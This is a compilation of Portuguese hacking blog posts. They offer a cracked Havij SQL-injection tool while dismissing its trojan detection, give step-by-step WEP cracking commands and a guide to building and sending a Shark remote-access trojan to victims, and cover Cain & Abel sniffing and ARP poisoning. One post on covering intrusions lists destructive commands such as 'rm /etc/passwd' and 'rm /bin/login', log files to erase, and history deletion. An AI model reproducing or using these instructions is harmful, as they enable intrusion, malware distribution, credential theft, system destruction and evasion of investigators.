Umas das melhores ferramentas para SQL injection + tutorial+ download ratão!

Havij uma das melhores ferramentas para automação de ataques SQL Injection que existem no mercado, ele é simples de usar e possui uma série de tutoriais em vídeo explicando como fazer, inclusive em português como demonstrado abaixo (desculpem pela voz do rapaz):

Como esta versão não tem loader, e tem que registrar, ele parece estar completamente sem bugs.

Vamos ao que interessa…

1- Instale o Havij (NÃO ABRA)
2- Rode o patch e crackeie o havij
3- Agora pode abrir o Havij, abra e registre ele clicando no botão register, com o seguinte nome: Cracked@By.Exidous
4- Selecione o arquivo de licensa e registre o Havij
5- Bom defacement!

Link para download: http://www.megaupload.com/?d=TUH2E9GG

Link scan: http://www.virustotal.com/file-scan/…c75-1311021286

PS: O trojan encontrado é por causa do software que foi usado para programação do patcher, não é uma ameaça.

Funcionando que não funcionava com loader:
Uso de Https;
Comandos CMD;
Comandos Query que não pegavam;
Sem problemas de runtime error;
Etc.

Uma tela com a cara do Havij:

O Havij é voltado para o mundo windows e deve ser usado com moderação. :)

Fonte:Link1 , Link2

Descriptar wep,wap com airodump-ng,aireplay-ng,aircrack-ng

Texto do Juan Carlos Cunha

Vejo em muitos blogs, pessoas tendo dificuldades para descriptar uma rede wirelless com chave WEP,WAP.

Vou dar uma receita de bolo aqui. Aqueles que são Script kiddies irão gostar, mas aqueles que querem realmente aprender: eu aconcelho a estudar, pois isso não é muito difícil, até fuçando você aprende.

Mas vamos ao que intereça.

Vou apresentar para vocês 4 programas que ajudan e auxiliam na descriptaçao da senha.

Airodump-ng, aireplay-ng, aircrack-ng, airmon-ng(nao usaremos, mas é bom voces pesquisarem um pouco sobre ele tambem).

Eu estou usando linux galera.

1º – ifconfig wlan() down //iremos definir uma conexão para a rede

2º – macchanger -m 00:11:22:33:44:55 wlan0 //definer uma MAC para a “wlan0”

3º – ifconfig wlan0 up //agora vamos fazer a wlan0 subir(definitivamente)

4º – airodump-ng wlan0 //Irá fazer com que pegue pacotes de todas as redes ativas, daí então você escolhe a rede que você quer si conectar, pegando o nome da autenticação que na maioria das vezes ficam no lado direito da tela do console. Assim que pegar a autenticação, dê um ctrl+c ou z para parar o recebimento dos pacotes.

5º – airodump-ng wlan0 -w autenticacao -c 8

Neste 5 passo, o seu computador irá capturar pacotes do alvo.

OBS: não pare o processo!

————————–Essa é a segunda etapa ——————————-

Abra uma nova janela do console do linux e vamos para a segunda etapa.

Nesta segunda etapa iremos acelerar o recebimento de pacotes com o aireplay-ng

1º – aireplay-ng -1 0 -e nome_da_rede_alvo –a //o nome da rede, você poderá obte-lo na primeira etapa.

2º – aireplay-ng -1 0 -e nome_da_rede_alvo -a 00:11:22:33:44:55 -h wlan0

3º – aireplay-ng -3 -b 00:11:22:33:44:55 -h wlan0 //acelerando captura de pacotes

Neste 3 passo, o seu computador irá acelerar a transmissão dos pacotes pacotes

OBS: não pare o processo!

————————–Essa é a terceira etapa——————————-

ABRA uma outra janela do console do linux e vamos para a terceira e ultima etapa da receita.

Espere alguns minutos(5 min), depois de acelerar os pacotes

1º – aircrack-ng teste.cap

Trojan shark: fazendo conexão reversa

tutorial trojan shark:

Só para deixar bem claro a diferença entre trojan e cavalo de tróia.

Trojan é um programa que é usado em conexão reversa ou inversa que geralmente é usado para invasão para pegar senha ou outras informações. O cavalo de troia é um programa que tem um pacote de virus que é usado geralmente para destruir um computador.

SharK é um trojan de conexão reversa, ele ao ser enviado para a vitima, faz com que o pc diga qual o seu ip!

Como criar um server:
-Primeiro de Tudo baixe o SharK:
http://www.4shared.com/file/29631048/c5b57345/sharK_232.html
Agora execute ele e vá em SharK > Create Server
-Veja a img e siga a legenda a seguir:
http://img167.imageshack.us/my.php?image=shaaarksettingstl7.png
De preto- é o nome do seu Server!
Vermelho- é o nome do seu server onde ira aparecer na barra de tarefas (ctrl +alt +del)
Verde- É onde o trojan ira se instalar.
Roxo- É a senha do seu server

Install Events
Enable msg on first start-Isso fara com que abra uma msg de erro quando a vitima executar o arquivo!
Execute File- Executara um programa junto com o Trojan.
Open WebPage- Abrira uma pagina (www.site.com.br) ao executar o server

Binde Files- Faz com que vc junte o server com um arquivo qualquer

Finalmente!
Va em compile e aperte COMPILE

Agora é só mandar o server para alquem

Vídeos Aula
http://br.youtube.com/watch?v=rqddB-BubEI

Cain & Abel – Guia completo

DOWNLOAD DA FERRAMENTA

1. inicio

O pacote virá com 3 programas: O Cain(O programa em si!), Abel, um “backdoor” para administração remota do Cain e a lib WinPcap, que permite a análise se redes. Se você não instalá-lo opções como sniffing não irão funcionar e o wintrgen, que é o gerador de rainbow table que esplicarei depois.

2. Start/Stop Sniffer e Start/Stop APR

Com este botão você poderá iniciar ou parar o sniffer. Para quem não sabe o sniffer deixa o seu adaptador de rede em modo promíscuo, ou seja, escutando todos os dados que trafegam pela rede mesmo não sendo direcionada para aquela máquina. Quando você clicar pela primeira vez aparecerá uma caixa de diálogo chamada Configurantion Dialog onde você deverá selecionar o adaptador a ser usado(caso sua máquina tenha mais que um) mas o programa configura automáticamente.

3. Guia Sniffer

Depois de iniciado o sniffer você poderá ver seus resultados na guia sniffer. Na parte inferior será subdividida em mais guias: Host, APR, Routing, Password, Voip

3.1 Host

Computadores que estão em sua subnet. Para ver os pc’s basta apenas clicar no botão + (Add to list). Ao clicar mostrará uma guia de scaneamento de mac address, você pode pôr uma faixa ou colocar para mostrar todos. Irão mostrar o endereço de ip, endereço MAC e fingerprint do pc.

3.2 APR

Muitas vezes sua rede é segmentada por switchs, fazendo assim você não poder sniffar outros segmentos. Para isso existe o que chamamos de ARP poisoning. o ARP poisoning consite em você envenenar a tabela ARP do seu switch fazendo ele receber os pacotes do pc que você deseja. Não entrarei em detalhes porque este não é meu objetivo. No guia APR você terá que escolher o tipo de APR: DNS, SSH-1, HTTPS ou RDP. Selecionado você terá que adicionar o host clicando no botão +. Lembre-se que o botão Start/Stop APR deve estar selecionado. Ao clicar no botão + aparecerá uma caixa com os hosts da sua subnet que obtivemos no guia host(Lembra?). Agora é preciso apenas adicionar os host para o APR. Depois de fazer isso você verá o ícone e do lado escrito poisoning.
O APR do Cain Também realiza o Homem no meio(man in the middle) em redes locais seguindo os mesmos procedimentos.

3.3 Routing

Esta seção pediria um explicação extensa, e como este é um manual básico, irei pular aqui. Desculpem-me!

3.4 Password

Esta seção, com o sniffer ligado, mostrará todas senhas que passam por você. Não precisa de nenhuma configuração, eles apareceram ali. Ele pega senhas de vários, você já deve ter visto a listinha dele. Mas as vezes as senhas podem vir criptografadas, explicarei isso mais abaixo.

3.5 Voip

Igual ao Password. Todas conexões de voip que aparecerem o cain gravará para você. Semelhante ao grampo de telefone, mas grampeia conversas no Voip.

4. Botões Add to list(+) e Remove from list(lixeira)

Servem para adiconar ou remover alguns itens que são usados em alguns guias.

5. Botão configure

É o mesmo que você selecionar o menu configure. Mostrará um guia para configuração. Não irei explicar aqui, mas só de você olhar você entenderá. Não precisará mexer, Pois o cain já configura tudo altomatimente.

6. Botão Base 64 password decoder

Serve para quebrar senhas criptografadas em Base 64. Basta colocar a senha.

7. Botão Access database password decoder

Quebra senhas de banco de dados Access. Basta selecionar o arquivo e o tipo.

8. Botões da CISCO

O primeiro serve para quebrar senhas do type-7 colocando a senha e outro do VPN Cient, colocando o arquivo. Esses botões não tem muito o que comentar…

9. Outros Botões de Password Decoder

Basta apenas colocar o password ou o arquivo e pronto. COmo disse não tem muito o que comentar. A partir daqui irei comentar somente o necessário, ok?

10. Box Revelator

Revelar senhas entre ******* das caixas de senhas?

11. Hash Calculator

Você digita o que quer e ele mostrará ele em hash. È necessario quando você precisa saber um hash específico ou fazer um teste.

12. RSA
Também não explicarei este. meu tempo muito curto!.

13. Guias
Já expliquei os principais botões. Agora os guias, que é o que falta.

13.1 Protected Storeg

Ele pega no registro senhas dos seguintes programas(se estiverem armazenadas no registro):
– MS Outlook 2002′s passwords(POP3, SMTP, IMAP, HTTP)
– Outlook Express’s passwords(POP3, NNTP, SMTP, IMAP, HTTP, LDAP, HTTP-Mail)
– Outlook Express Identities
– MS Outlook’s passwords (POP3, NNTP, SMTP, IMAP, LDAP, HTTP-Mail)
– MSN Explorer’s Sign In passwords
– MSN Explorer’s Auto Complete passwords
– Internet Explorer’s protected sites passwords
– Internet Explorer’s Auto complete passwords

Basta clicar no botão +.

13.2 Network
Mostra detalhes da rede.

13.3 LSA Secrets
também pega do registro senhas usadas para iniciar serciços como senhas do arquivo SAM. Clique no Botão +.

13.4 Cracker

Quando você obtem senhas criptografadas você pode clicar com o botão direito e colocar “send to crack”. Lá ele divide os passwords e faz a quebra através de alguns tipo de força bruta, ataque de dicionário, criptoanálise(Você verificar em uma rainbow table feita no wintrgen) ou rainbowcrack-online.

13.5 Traceroute
É o tracert do windows ou traceroute do linux com mais opções.

13.6 CCDU (Cisco COnfig Downloader)
Configurações CISCO. Para usuários mais avaçados.

13.7 Wireless
Através de um dispositivo wireless varre por redes sem fio.

 

Se quiser ver uma super materia sobre a ferramenta com tutorial e explicando bem mais detalhadamente a ferramenta, clique em LEIA MAIS

Continuar lendo

Patator: Brutal Force para todas as ocasiões

Imagine simplesmente fazer a união do Medusa, Hydra, ncrack, módulos auxiliares do metasploit , nmapNSE scripts e mais algumas coisitas.

Tudo isso reunido e com algumas melhores criaram um script desenvolvido em Pytho que é porreta.. :)

Pois é.. esse é o PATATOR!

Vejam a quantidade de módulos que o patator suporta:

  • ftp_login : Brute-force FTP
  • ssh_login : Brute-force SSH
  • telnet_login : Brute-force Telnet
  • smtp_login : Brute-force SMTP
  • smtp_vrfy : Enumerate valid users using the SMTP VRFY command
  • smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
  • http_fuzz : Brute-force HTTP/HTTPS
  • pop_passd : Brute-force poppassd (not POP3)
  • ldap_login : Brute-force LDAP
  • smb_login : Brute-force SMB
  • mssql_login : Brute-force MSSQL
  • oracle_login : Brute-force Oracle
  • mysql_login : Brute-force MySQL
  • pgsql_login : Brute-force PostgreSQL
  • vnc_login : Brute-force VNC
  • dns_forward : Forward lookup subdomains
  • dns_reverse : Reverse lookup subnets
  • snmp_login : Brute-force SNMPv1/2 and SNMPv3
  • unzip_pass : Brute-force the password of encrypted ZIP files
  • keystore_pass : Brute-force the password of Java keystore files

O download do patator poderá ser feito a partir do seguinte link.

Script para atualizar BackTrack e suas ferramentas

backtrack5_update.py é um script desenvolvido em Python que tem a função de atualizar de forma automática o seu backtrack e todas as ferramentas que estão neles instaladas, por default ;)

A execução é bem simples, basta seguir os passos abaixo:

# download script from sickness.tor.hu

wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.py

#change permissions
chmod a+x backtrack5_update.py

#execute script
./backtrack5_update.py

Vejam a tela que ele lhe apresenta e suas opções:

Fonte:CorujadeTi

Apagando rastros de uma invasão no backtrack

 

Um micro pode armazenar muitos tipos de pistas, e tipos de ataques, então, como entrar em um micro e sair sem deixar pistas?

Existem muitos tipos de ferramentas como backdoors, sniffers, logs e outros serviços. Existem algumas coisa a serem consideradas, como criar um usuário e saber se o user tem privilégios suficientes, e saber como deletar esse user…

Muitos são limitados apenas a destruir o access_log do apache, a webshell, o backdoor e a raiz do exploit.

Existem muitas ferramentas que prometem remover todos os vestígios, mas isso não e verdade. Isso e não para ser um guia perfeito e sim da um ênfase a essa etapa, um orientação de para um serviço perfeito.

Vou deixar os credito ao overload, vamos a uma visão geral dos mais usados:

1° Destruição do sistema
* Quando perceber que não ha mais alternativas.

Desative o login, isso causa estragos de tal forma que pode causa uma destruição total ou parcial, aqui estão alguns comandos mais usados:
rm /etc/passwd
rm /etc/shadow
rm /bin/login
rm /bin/rm
rm /etc/inetd.conf
killall login

2° Captura e remoção do log de acesso do Apache.
* Isso somente seria viável se o ataque fosse apenas no site usando uma webshell. Ele pode ser removido ou editado, tome cuidado para não deixar nada errado.

Diretórios mais comuns que armazenam os dados:
apache/logs/error.log
apache/logs/access.log
apache/logs/error.log
apache/logs/access.log
apache/logs/error.log
apache/logs/access.log
etc/httpd/logs/acces_log
etc/httpd/logs/acces.log
etc/httpd/logs/error_log
etc/httpd/logs/error.log
var/www/logs/access_log
var/www/logs/access.log
usr/local/apache/logs/access_log
usr/local/apache/logs/access.log
var/log/apache/access_log
var/log/apache2/access_log
var/log/apache/access.log
var/log/apache2/access.log
var/log/access_log
var/log/access.log
var/www/logs/error_log
var/www/logs/error.log
usr/local/apache/logs/error_log
usr/local/apache/logs/error.log
var/log/apache/error_log
var/log/apache2/error_log
var/log/apache/error.log
var/log/apache2/error.log
var/log/error_log
var/log/error.log
var/log/access_log
var/log/access_log

3° Eliminar o Bash history.
* Muitos se esquecem dele.
* E muitos simples edita-lo ou elimina-lo, o arquivo e .bash_history ou .sh_history
* Isso somente e para ser feito antes de sair.

4° Removendo os rastros de exploits, sniffers, webshells e etc…
* E sempre bom ter um root explit em mãos…

5° Tenha cuidados com as mudanças no sistema.
* Essa e uma parte importantes, se você fez alterações no sistema e for pego, a pena e mais grave dependendo do pais que foi feito a invasão do website.

6° Cuidado com os backdoors.
* Em um curto espaço de tempo, ele pode passar despercebido, mas pode se encontrado.

7° Remove todas as contas criados, principalmente se você for ROOT.
* Não e suficiente para remover permissões de shell (/sh/false)

8° Você deve ter atenção, para não ter alguém conectado no sistema.
* Ter alguém conectado pode ser muito perigoso, você pode ser rastreado e capturado facilmente.

9° Desconfie de tudo, a melhor solução e sigilo absoluto.
* Não e o que acontece com a maioria, eles gostam de se gabar do feito, sem leve em conta que isso poderia leva alguém a espiona-lo.
* Lembre-se que não existe proxy 100% seguro.

10° Tome cuidado com o syslog.
* As vezes pode ser mais complexo do que o normal se livrar das alterações feita nele.

11° Alguns comandos interessantes.
* Who – Lista usuários ativos.
* last – Login do ultimo usuário.
* ps – Lista os processos ativos
* lastcom/hostory – Mostra os comandos digitados por um determinado usuário.

12° Arquivos perigosos.
* utmp – Grava um registro(log) dos usuários que estão usando o sistema enquanto estiverem conectados a ele. ele se encontra no diretório /var/adm/utmp e /etc/utmp
* wtmp – Grava um registro de cada vez que um usuário entra no sistema, ou sair do sistema.
* lastlog – Grava um registro exato de quando o usuário entrou pela ultima vez.
* acct ou pacct – Registra todos os comandos executados por cada usuário(mas não grava os argumentos para estes comandos executados).

Fonte: http://remote-execution.blogspot.com…a-invasao.html

Apagando seus rastros na internet

Pessoal de segurança devem saber que navegar anônimo não é suficiente para ficar imune perante a lei, pois isso não adianta caso vc seja invadido ou tenha seu pc apreendido… então vai ai ferramentas muito boas para apagar os rastros do seu pc..

Evidence Eliminator
Elimina qualquer evidencia de atividade em seu PC. O programa apaga informações que ficam armazenadas secretamente em seu PC mantendo sua privacidade segura.

History Eraser Internet
Limpe suas atividades na Internet como histórico, cookies,cache de browser e outros..todas funções podem ser programadas para serem executadas em intervalos de tempo.

Download
http://www.4shared.com/folder/A-CPnO…arRastros.html

Protegendo-se contra SQL Injection

Sumario da Apostila:

Criando uma query
Principio do sqlinjection
Criando um sistema de login E senha para testes
Burlar uma query
Burlar um sistema de login e senha
Usando parâmetro UNION
Inserindo dados no banco de dados sem permissão
Alterando dados do banco de dados sem permissão
Excluindo dados do banco de dados sem permissão
Excluindo tabelas do banco de dados sem permissão
Excluindo database sem permissão
Descobrir nome das colunas do banco de dados
Descobrir nomes de tabelas do banco de dados
Protegendo dados do banco
Imunizando site, sistema… do sqlinjection
Proteção na query
conclusão

Download